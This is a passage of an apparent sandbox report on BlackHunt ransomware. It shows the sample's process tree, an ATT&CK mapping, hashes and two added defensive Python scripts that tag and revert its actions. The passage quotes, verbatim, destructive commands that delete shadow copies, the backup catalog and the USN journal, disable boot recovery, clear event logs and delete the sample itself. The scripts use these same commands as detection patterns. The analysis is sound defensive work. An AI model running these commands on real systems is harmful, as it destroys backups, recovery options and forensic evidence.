C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:5768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:4908
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5464
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5460
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5456
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4700
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5008
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:5636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4844
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4912
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5676
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe"2⤵
- Deletes itself
PID:5756 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:5520
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:6008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5820
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:5764
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2143865160558505714-951798863323846685-3172112052369306921877588032-481563123"1⤵PID:2888
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2016
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3188
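The registry writes in the tree above fall into four groups: Defender policy tampering (real-time protection off, sample submission set to 2 = never send, the default action for every threat severity set to 6 = Allow, notifications suppressed), recovery-tooling policies (System Restore, WinRE, the Backup client UI), HKCU desktop lockdown (NoClose, StartMenuLogOff, NoRun, DisableTaskMgr, DisableLockWorkstation, NoLogoff, DisableChangePassword) and the HKLM legal-notice caption and text that carry the ransom message; NoRun and DisableTaskMgr are set back to 0 near the end of the run. The following is an added example, written by the editor and not part of the tria.ge report or of the sample, that parses such `reg add` command lines, classifies each write against a watchlist of those policy keys and emits the `reg delete` that removes the policy value again. The watchlist descriptions and the choice of `reg delete` as the remediation are the editor's assumptions, and the sample input is constructed from the command lines above (the legal-notice text is shortened).

```python
"""Editor's added example (not the report's or the sample's code): parse
`reg add` command lines, classify each write against a policy watchlist and
emit a `reg delete` that removes the value again. Watchlist descriptions are
the editor's summaries; treat the generated commands as a starting point."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

HIVES = {"hkey_local_machine": "HKLM", "hklm": "HKLM",
         "hkey_current_user": "HKCU", "hkcu": "HKCU"}

# (hive, lower-cased subkey prefix, category, editor's description)
WATCHLIST = [
    ("HKLM", r"software\policies\microsoft\windows defender\real-time protection", "defender-tamper", "disables Defender real-time scanning by policy"),
    ("HKLM", r"software\policies\microsoft\windows defender\spynet", "defender-tamper", "sets cloud sample-submission consent (2 = never send)"),
    ("HKLM", r"software\policies\microsoft\windows defender\threats", "defender-tamper", "overrides the default action per threat severity (6 = allow)"),
    ("HKLM", r"software\policies\microsoft\windows defender\ux configuration", "defender-tamper", "suppresses Defender notifications"),
    ("HKLM", r"software\policies\microsoft\windows nt\systemrestore", "recovery-inhibit", "disables System Restore and its configuration UI"),
    ("HKLM", r"software\policies\microsoft\windows\winre", "recovery-inhibit", "Windows Recovery Environment policy"),
    ("HKLM", r"software\policies\microsoft\windows\backup\client", "recovery-inhibit", "hides the Windows Backup and Restore UI"),
    ("HKCU", r"software\microsoft\windows\currentversion\policies\explorer", "user-lockdown", "Explorer restrictions (NoRun, NoClose, StartMenuLogOff)"),
    ("HKCU", r"software\microsoft\windows\currentversion\policies\system", "user-lockdown", "desktop restrictions (DisableTaskMgr, DisableLockWorkstation, ...)"),
    ("HKLM", r"software\microsoft\windows\currentversion\policies\system", "logon-banner", "legal notice caption/text shown before logon"),
]

# Constructed sample input: command lines copied from the tree above (the
# legal-notice text is shortened); the last line is a non-registry control.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f',
    r'reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f',
    r'REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. " /f',
    r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f',
    r'"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet',
]

@dataclass
class RegWrite:
    hive: str    # normalised to HKLM / HKCU
    key: str     # subkey path as written, hive stripped
    name: str
    vtype: str
    data: str

@dataclass
class Finding:
    category: str
    description: str
    write: RegWrite
    loosens: bool    # data is "0": the restriction is lifted again (NoRun, DisableTaskMgr above)
    revert_cmd: str

def split_cmdline(cmdline: str) -> List[str]:
    """Minimal Windows-style tokenizer: whitespace separates arguments and a
    double-quoted run is one argument with the quotes stripped (no escapes)."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]

def parse_reg_add(cmdline: str) -> Optional[RegWrite]:
    argv = split_cmdline(cmdline)
    # Unwrap `cmd.exe /c <command>`, the way every reg.exe above is launched.
    if argv and argv[0].rsplit("\\", 1)[-1].lower() in ("cmd", "cmd.exe"):
        lowered = [a.lower() for a in argv]
        if "/c" in lowered:
            argv = argv[lowered.index("/c") + 1:]
    if len(argv) < 3 or argv[0].rsplit("\\", 1)[-1].lower() not in ("reg", "reg.exe"):
        return None
    if argv[1].lower() != "add":
        return None
    hive_raw, _, subkey = argv[2].partition("\\")
    hive = HIVES.get(hive_raw.lower())
    if hive is None or not subkey:
        return None
    opts: Dict[str, str] = {}
    i = 3
    while i < len(argv):
        if argv[i].lower() in ("/v", "/t", "/d") and i + 1 < len(argv):
            opts[argv[i].lower()] = argv[i + 1]
            i += 2
        else:
            i += 1     # /f, /ve, /reg:64 and anything else are ignored here
    if "/v" not in opts:
        return None    # writes to the (Default) value are out of scope
    return RegWrite(hive, subkey, opts["/v"], opts.get("/t", "REG_SZ"), opts.get("/d", ""))

def classify(write: RegWrite) -> Finding:
    key_l = write.key.lower()
    category, description = "other", "not on the watchlist"
    for hive, prefix, cat, desc in WATCHLIST:
        if write.hive == hive and (key_l == prefix or key_l.startswith(prefix + "\\")):
            category, description = cat, desc
            break
    revert = f'reg delete "{write.hive}\\{write.key}" /v "{write.name}" /f'
    return Finding(category, description, write, write.data.strip() == "0", revert)

def triage(cmdlines: List[str]) -> List[Finding]:
    return [classify(w) for w in map(parse_reg_add, cmdlines) if w is not None]

def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.category] = counts.get(f.category, 0) + 1
    return counts

def remediation(findings: List[Finding]) -> List[str]:
    """Unique `reg delete` commands for watchlisted writes, first-seen order."""
    seen: List[str] = []
    for f in findings:
        if f.category != "other" and f.revert_cmd not in seen:
            seen.append(f.revert_cmd)
    return seen

if __name__ == "__main__":
    found = triage(SAMPLE_CMDLINES)
    for f in found:
        print(f"[{f.category}] {'lifts' if f.loosens else 'sets'} {f.write.name}={f.write.data.strip()!r}: {f.description}")
    print(summarize(found))
    print("\n".join(remediation(found)))
```

The `cmd.exe /c` unwrapping matters because every reg.exe in the tree is launched through a cmd wrapper, so the same parser works on either the depth-2 or the depth-3 command line; the `loosens` flag separates the final NoRun/DisableTaskMgr resets from the earlier lockdown writes so a report does not count them as further tampering.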
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (2)
  - Disable or Modify Tools (2)
- Indicator Removal (4)
  - File Deletion (3)
- Modify Registry (5)
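The non-registry commands in the tree are the usual ransomware recovery-inhibition sequence: vssadmin first caps shadow storage on each volume at 401MB and then sets it back to unbounded (shrinking the cap below what the existing shadow copies occupy makes VSS discard them, so the copies are already gone before the explicit Delete Shadows), bcdedit turns off boot-time recovery, wbadmin deletes the backup catalog, fsutil deletes the USN journal on C:, F: and M:, the SystemRestore\SR task is disabled, and wevtutil clears the Setup, System, Security and Application logs. A SYSTEM scheduled task named "Windows Critical Update" provides persistence during the run and is deleted again later, and the sample removes itself with the ping-then-del idiom. The following is an added example, the editor's code rather than the report's or the sample's, that tags such process-creation events with ATT&CK technique IDs and detects the shadow-storage squeeze as a per-volume sequence rather than as isolated commands. The event fields, the technique mapping and the verdict threshold are the editor's assumptions; the events are constructed from the command lines above.

```python
"""Editor's added example (not the report's or the sample's code): tag
process-creation events with ATT&CK technique IDs for recovery-inhibition,
log-clearing, persistence and self-deletion commands, and detect the
shadow-storage squeeze as a per-volume sequence. Field names, the technique
mapping and the verdict threshold are the editor's assumptions."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

@dataclass
class Event:
    pid: int
    image: str
    cmdline: str

@dataclass
class Tagged:
    event: Event
    hits: List[Tuple[str, str]] = field(default_factory=list)  # (technique, label)

RULES = [(tech, label, re.compile(rx, re.IGNORECASE)) for tech, label, rx in [
    ("T1490", "deletes volume shadow copies", r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b"),
    ("T1490", "resizes shadow storage", r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b"),
    ("T1490", "deletes the Windows Backup catalog", r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b"),
    ("T1490", "disables boot-time recovery", r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b"),
    ("T1490", "disables the SystemRestore\\SR task", r'\bschtasks(?:\.exe)?\s+/change\s+/tn\s+"?\\microsoft\\windows\\systemrestore\\sr"?\s+/disable\b'),
    ("T1070.001", "clears a Windows event log", r"\bwevtutil(?:\.exe)?\s+cl\s+\S+"),
    ("T1070", "deletes the NTFS USN change journal", r"\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b"),
    ("T1053.005", "creates a SYSTEM task that runs at boot", r'\bschtasks(?:\.exe)?\s+/create\b.*?/ru\s+"?nt authority\\system"?.*?/sc\s+onstart\b'),
    ("T1070.004", "self-deletion via ping delay then del", r"\bping\s+127\.0\.0\.1\s+-n\s+\d+\b.*&\s*del\s+"),
]]

RESIZE_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b.*?/for=(?P<vol>[a-z]:).*?/maxsize=(?P<size>\S+)", re.IGNORECASE)

SYS32 = r"C:\Windows\system32"
SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\51a8e6401fb3a9a3ce500662a66299e3df7c9a47df23e470a4aa32e4d60314b4.exe"

# Constructed sample input: a subset of the tree above with its PIDs; the
# last event is a benign-looking control that should get no tags.
EVENTS = [
    Event(2616, SYS32 + r"\vssadmin.exe", r"vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB"),
    Event(1560, SYS32 + r"\vssadmin.exe", r"vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded"),
    Event(2188, SYS32 + r"\vssadmin.exe", r"vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB"),
    Event(1460, SYS32 + r"\vssadmin.exe", r"vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded"),
    Event(3136, SYS32 + r"\vssadmin.exe", "vssadmin.exe Delete Shadows /all /quiet"),
    Event(2240, SYS32 + r"\bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    Event(2000, SYS32 + r"\fsutil.exe", "fsutil.exe usn deletejournal /D C:"),
    Event(3004, SYS32 + r"\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy IgnoreAllFailures"),
    Event(880, SYS32 + r"\wbadmin.exe", "wbadmin.exe delete catalog -quiet"),
    Event(1668, SYS32 + r"\schtasks.exe", r'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable'),
    Event(2696, SYS32 + r"\schtasks.exe", f'SCHTASKS.exe /Create /RU "NT AUTHORITY\\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "{SAMPLE_EXE}" /F'),
    Event(5688, SYS32 + r"\wevtutil.exe", "wevtutil.exe cl Security /e:false"),
    Event(5796, SYS32 + r"\wevtutil.exe", "wevtutil.exe cl Application"),
    Event(5756, r"C:\Windows\SysWOW64\cmd.exe", f'"C:\\Windows\\System32\\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "{SAMPLE_EXE}"'),
    Event(5764, SYS32 + r"\notepad.exe", r"notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt"),
]

def tag(events: List[Event]) -> List[Tagged]:
    """Attach every matching (technique, label) pair to each event."""
    return [Tagged(ev, [(t, l) for t, l, rx in RULES if rx.search(ev.cmdline)]) for ev in events]

def shadowstorage_squeeze(events: List[Event]) -> List[Tuple[str, str]]:
    """Volumes whose shadow storage was capped to a size and then set back to
    unbounded. Capping below what the existing shadow copies occupy makes VSS
    discard them, so the pair is a deletion without the words 'delete shadows'."""
    cap: Dict[str, str] = {}
    squeezed: List[Tuple[str, str]] = []
    for ev in events:
        m = RESIZE_RE.search(ev.cmdline)
        if not m:
            continue
        vol, size = m.group("vol").upper(), m.group("size")
        if size.lower() == "unbounded":
            if vol in cap:
                squeezed.append((vol, cap.pop(vol)))
        else:
            cap[vol] = size
    return squeezed

def verdict(events: List[Event]) -> dict:
    tagged = tag(events)
    techniques = Counter(t for tg in tagged for t, _ in tg.hits)
    # Editor's threshold: several recovery-inhibition commands plus event-log
    # clearing is the pre-encryption pattern the tree above shows.
    pattern = techniques["T1490"] >= 2 and techniques["T1070.001"] >= 1
    return {"tagged": tagged, "techniques": dict(techniques),
            "squeeze": shadowstorage_squeeze(events), "ransomware_pattern": pattern}

if __name__ == "__main__":
    result = verdict(EVENTS)
    for tg in result["tagged"]:
        print(tg.event.pid, [t for t, _ in tg.hits], tg.event.cmdline[:60])
    print(result["techniques"], result["squeeze"], result["ransomware_pattern"])
```

The sequence check is the part single-command rules miss: `vssadmin resize shadowstorage` on its own is also what administrators run, and it is the 401MB-then-unbounded pair per volume that identifies the eviction trick, so alert on the pair (or on the cap alone when it is far below current usage) rather than on the verb.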
Downloads
- Filesize: 12KB
  MD5: f9a4fd033e1cda1224fa4f45bfe30421
  SHA1: 019dbcfa64aa66086d81a3c156e4fa6d5c305772
  SHA256: a1678bdff15a3951c16d8a022a4e79893e2344564439b75b6cecde9f72a00fc7
  SHA512: 0a125e8a78d6b73cd0cec21a1e521a2ea1dcfa72230eac7cdb8ee9e57ffac4330dd16503d80175d3f3cc7fe9cb9a0ba0de4f6d5fa612d7a0900fc3ab3fc2cd14
- Filesize: 1KB
  MD5: e4be6000224f7629c7201a499c81bb9e
  SHA1: 31f0ef6c5807ecdab87090c00852a8ca42a9cacd
  SHA256: 1b2567249f83f4cf12fd0bf4d557ddb2618124a617c5444470030059b743f98a
  SHA512: f9ec118d8a13126e91049e7f030ae0bf2ff86e80ee94650ee378cc26258295f32b42c11e1922f5cd16bf0a0154d6cbc6e20cdce5cd1894ba69aec4656688611d
- Filesize: 684B
  MD5: 1f6f543be03e7c672ba79ee103dc199c
  SHA1: 3a34034fecb2750f73f33b2eef3830b2aa664c25
  SHA256: 368b7cb58d121067a350444bc2298fc16de3fddd37316b03024f6d532d397a20
  SHA512: dcf05a42f61497a7828b5a9def7580ff0f900f9daf388492020836da7f40ad4b97ba64815aa5d424ab1160f307267b51d0468ef3e482e2c7a7e04f3f3ab43a84